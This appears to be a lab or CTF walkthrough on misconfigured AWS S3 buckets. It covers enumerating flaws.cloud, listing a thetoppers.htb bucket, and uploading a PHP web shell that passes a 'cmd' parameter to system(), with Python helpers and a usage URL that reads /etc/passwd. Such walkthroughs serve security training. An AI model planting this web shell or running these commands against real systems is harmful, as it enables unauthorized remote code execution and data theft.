Basic Enumeration

The site flaws.cloud is hosted as an S3 bucket. This is a great way to host a static site, similar to hosting one via GitHub Pages.

Some interesting facts about S3 hosting: when hosting a site as an S3 bucket, the bucket name (flaws.cloud) must match the domain name (flaws.cloud). Also, S3 bucket names share a global namespace, meaning two people cannot have buckets with the same name. As a result, you could create a bucket named apple.com, and Apple would never be able to host their main site via S3 hosting.

You can determine that the site is hosted as an S3 bucket by running a DNS lookup on the domain, such as:

dig +nocmd flaws.cloud any +multiline +noall +answer

# Returns:

# flaws.cloud. 5 IN A 54.231.184.255

Visiting 54.231.184.255 in your browser redirects you to https://aws.amazon.com/s3/, so you know flaws.cloud is hosted as an S3 bucket.

You can then run:

nslookup 54.231.184.255

# Returns:

# Non-authoritative answer:

# 255.184.231.54.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

So we know it’s hosted in the AWS region us-west-2.

Side note (not useful for this game): All S3 buckets, when configured for web hosting, are given an AWS domain you can use to browse to them without setting up your own DNS. In this case, flaws.cloud can also be visited by going to http://flaws.cloud.s3-website-us-west-2.amazonaws.com/
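The two steps above (reading the region out of the reverse-DNS name, then forming the AWS-provided website domain) can be sketched in Python. This is a minimal illustration, not part of the original walkthrough: the function names `region_from_ptr` and `website_endpoint` are hypothetical, and the URL builder assumes the dash-style `s3-website-<region>` hostname shown in the text.

```python
import re
from typing import Optional

# Matches reverse-DNS names such as "s3-website-us-west-2.amazonaws.com".
# A dot after "s3-website" is also accepted, since some regions use that form.
_WEBSITE_HOST = re.compile(r"^s3-website[-.]([a-z0-9-]+)\.amazonaws\.com\.?$")


def region_from_ptr(hostname: str) -> Optional[str]:
    """Return the region embedded in an S3 website PTR name, or None."""
    match = _WEBSITE_HOST.match(hostname.strip().lower())
    return match.group(1) if match else None


def website_endpoint(bucket: str, region: str) -> str:
    """Build the dash-style website URL (assumption: same form as in the text)."""
    return f"http://{bucket}.s3-website-{region}.amazonaws.com/"


if __name__ == "__main__":
    region = region_from_ptr("s3-website-us-west-2.amazonaws.com")
    if region is not None:
        print(region)
        print(website_endpoint("flaws.cloud", region))
```

A name that does not look like an S3 website host returns `None`, which is a reasonable signal that the site is probably not served from S3 website hosting.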

You now know that there is a bucket named flaws.cloud in us-west-2, so you can attempt to browse the bucket with the AWS CLI by running:

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

If you do not know the region, there is only a limited set of regions to try. You could also use the GUI tool Cyberduck to browse this bucket; it will figure out the region automatically.
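Trying each region by hand gets tedious, so the candidate commands can be generated instead. The sketch below only builds the command lines and does not run them. The region list is a short, non-exhaustive sample chosen for illustration, and `listing_commands` is a hypothetical helper name.

```python
import shlex

# A short, non-exhaustive sample of region names; extend it as needed.
CANDIDATE_REGIONS = ["us-east-1", "us-east-2", "us-west-1", "us-west-2", "eu-west-1"]


def listing_commands(bucket, regions=CANDIDATE_REGIONS):
    """Return one unauthenticated `aws s3 ls` command line per region."""
    commands = []
    for region in regions:
        argv = ["aws", "s3", "ls", f"s3://{bucket}/",
                "--no-sign-request", "--region", region]
        commands.append(shlex.join(argv))  # quote each argument for the shell
    return commands


if __name__ == "__main__":
    for command in listing_commands("flaws.cloud"):
        print(command)
```

Each printed line can be pasted into a shell; the first one that returns a listing rather than an error identifies the region.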

Finally, you can also just visit http://flaws.cloud.s3.amazonaws.com/ which lists the files due to the permissions issues on this bucket.
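A listable bucket answers that request with an XML document rather than a web page. As a rough sketch, the object names can be pulled out with Python's standard library. The sample body below is hypothetical (the bucket and object names are made up), and `object_keys` is an illustrative helper, not something from the original write-up.

```python
import xml.etree.ElementTree as ET

# Namespace used by S3 bucket listing responses.
S3_NS = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}

# Hypothetical response body; names and sizes are invented for illustration.
SAMPLE_LISTING = """<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>example-bucket</Name>
  <Contents><Key>index.html</Key><Size>1024</Size></Contents>
  <Contents><Key>robots.txt</Key><Size>26</Size></Contents>
</ListBucketResult>"""


def object_keys(xml_text):
    """Return (key, size) pairs for every <Contents> entry in a listing."""
    root = ET.fromstring(xml_text)
    pairs = []
    for item in root.findall("s3:Contents", S3_NS):
        key = item.findtext("s3:Key", namespaces=S3_NS)
        size = int(item.findtext("s3:Size", namespaces=S3_NS))
        pairs.append((key, size))
    return pairs


if __name__ == "__main__":
    for key, size in object_keys(SAMPLE_LISTING):
        print(f"{size:>8}  {key}")
```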

Bucket Listing

On AWS you can set up S3 buckets with all sorts of permissions and functionality including using them to host static files. A number of people accidentally open them up with permissions that are too loose. Just like how you shouldn’t allow directory listings of web servers, you shouldn’t allow bucket listings.

We can interact with this S3 bucket using the awscli utility. On Debian-based Linux distributions, it can be installed with:

apt install awscli

First, we need to configure it using the following command. We will be using an arbitrary value for all the fields, as sometimes the server is configured to not check authentication (still, it must be configured to something for aws to work).

aws configure

AWS Access Key ID [None]: Temp

AWS Secret Access Key [None]: Temp

Default region name [None]: Temp

Default output format [None]: Temp

Sometimes the bucket is not properly configured; in that case, we can fill this configuration with any arbitrary value. However, sometimes the bucket actually requires valid credentials, in which case you will need your own AWS account. The free tier is sufficient.
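For context, `aws configure` stores these answers in two INI-style files: `~/.aws/credentials` for the keys and `~/.aws/config` for the region and output format. The sketch below renders the equivalent text for the placeholder values used above, without touching the disk. `render_profile` is a hypothetical helper, and the exact spacing the CLI writes may differ slightly.

```python
import configparser
import io


def render_profile(access_key, secret_key, region, output):
    """Return (credentials_text, config_text) for the [default] profile."""
    credentials = configparser.ConfigParser(interpolation=None)
    credentials["default"] = {
        "aws_access_key_id": access_key,
        "aws_secret_access_key": secret_key,
    }
    config = configparser.ConfigParser(interpolation=None)
    config["default"] = {"region": region, "output": output}

    rendered = []
    for parser in (credentials, config):
        buffer = io.StringIO()
        parser.write(buffer)  # serialize to INI text in memory only
        rendered.append(buffer.getvalue())
    return tuple(rendered)


if __name__ == "__main__":
    creds_text, config_text = render_profile("Temp", "Temp", "Temp", "Temp")
    print(creds_text)
    print(config_text)
```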

We can list all of the S3 buckets hosted by the server by using the ls command.

aws --endpoint=http://s3.thetoppers.htb s3 ls

2023-05-23 20:30:11 thetoppers.htb

We can also use the ls command to list objects and common prefixes under the specified bucket.

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

PRE images/

2023-05-23 20:30:11 0 .htaccess

2023-05-23 20:30:11 11952 index.php
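When a listing is long, it can help to turn this output into structured records. The following is a minimal sketch that parses the lines shown above, where `PRE` marks a common prefix and the other lines carry a date, time, size, and object name. The `Entry` class and `parse_ls` function are hypothetical names introduced for illustration.

```python
from dataclasses import dataclass
from typing import List, Optional

# The listing output shown above, reproduced as a string.
SAMPLE_OUTPUT = """PRE images/
2023-05-23 20:30:11 0 .htaccess
2023-05-23 20:30:11 11952 index.php
"""


@dataclass
class Entry:
    name: str
    is_prefix: bool
    size: Optional[int] = None
    modified: Optional[str] = None


def parse_ls(output: str) -> List[Entry]:
    """Parse `aws s3 ls` output into prefix and object entries."""
    entries = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "PRE":
            # Common prefix ("directory"): everything after the PRE marker.
            entries.append(Entry(name=line.split(None, 1)[1].strip(), is_prefix=True))
        elif len(parts) >= 4:
            # Object line: date, time, size in bytes, then the key.
            date, time, size, name = line.split(None, 3)
            entries.append(Entry(name.strip(), False, int(size), f"{date} {time}"))
    return entries


if __name__ == "__main__":
    for entry in parse_ls(SAMPLE_OUTPUT):
        print(entry)
```

Filtering the result for names ending in `.php` is one quick way to confirm which server-side language the site uses.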

File Upload / Reverse Shell

awscli has another feature that allows us to copy files to a remote bucket. If we know the server-side scripting language the site uses, such as PHP, we can try uploading a PHP shell file to the S3 bucket. Since it is uploaded to the webroot directory, we can visit the page in the browser, which will in turn execute the file and give us remote code execution.



We can use the following simple PHP backdoor, which passes the URL parameter cmd to the system() function and executes it as a system command. It can be found at /usr/share/webshells/php/simple-backdoor.php

<?php

if(isset($_REQUEST['cmd'])){

echo "<pre>";

$cmd = ($_REQUEST['cmd']);

system($cmd);

echo "</pre>";

die;

}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
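Commands containing spaces or shell metacharacters must be URL-encoded before they go into the `cmd` parameter. As a small sketch, Python's `urllib.parse.quote_plus` can build the request URL in the same style as the usage line above. `backdoor_url` is a hypothetical helper, and keeping `/` unescaped is a choice made here only to match that usage line.

```python
from urllib.parse import quote_plus


def backdoor_url(base_url: str, command: str) -> str:
    """Return the URL that passes `command` in the cmd query parameter."""
    # Spaces become "+", other special characters are percent-encoded,
    # and "/" is left as-is to mirror the usage example.
    return f"{base_url}?cmd={quote_plus(command, safe='/')}"


if __name__ == "__main__":
    print(backdoor_url("http://target.com/simple-backdoor.php", "cat /etc/passwd"))
```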

Then, we can upload this PHP shell to the thetoppers.htb S3 bucket using the following command.

aws --endpoint=http://s3.thetoppers.htb s3 cp simple-backdoor.php s3://thetoppers.htb
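The listing and upload commands all share the same custom endpoint, so when scripting them it may be convenient to build the argument list in one place. This is a rough sketch under assumptions: `aws_s3_argv` and `run_aws_s3` are hypothetical helpers, and the sketch spells the flag out as `--endpoint-url`, the full form of the option abbreviated as `--endpoint` above.

```python
import shlex
import subprocess


def aws_s3_argv(endpoint, *s3_args):
    """Build the argv for an `aws s3` call against a custom endpoint."""
    return ["aws", "--endpoint-url", endpoint, "s3", *s3_args]


def run_aws_s3(endpoint, *s3_args):
    """Run the command and return its stdout (requires awscli on PATH)."""
    result = subprocess.run(aws_s3_argv(endpoint, *s3_args),
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    # Only print the upload command here; call run_aws_s3() to execute it.
    argv = aws_s3_argv("http://s3.thetoppers.htb", "cp",
                       "simple-backdoor.php", "s3://thetoppers.htb")
    print(shlex.join(argv))
```

Passing the arguments as a list rather than a single shell string avoids quoting problems if a file name contains spaces.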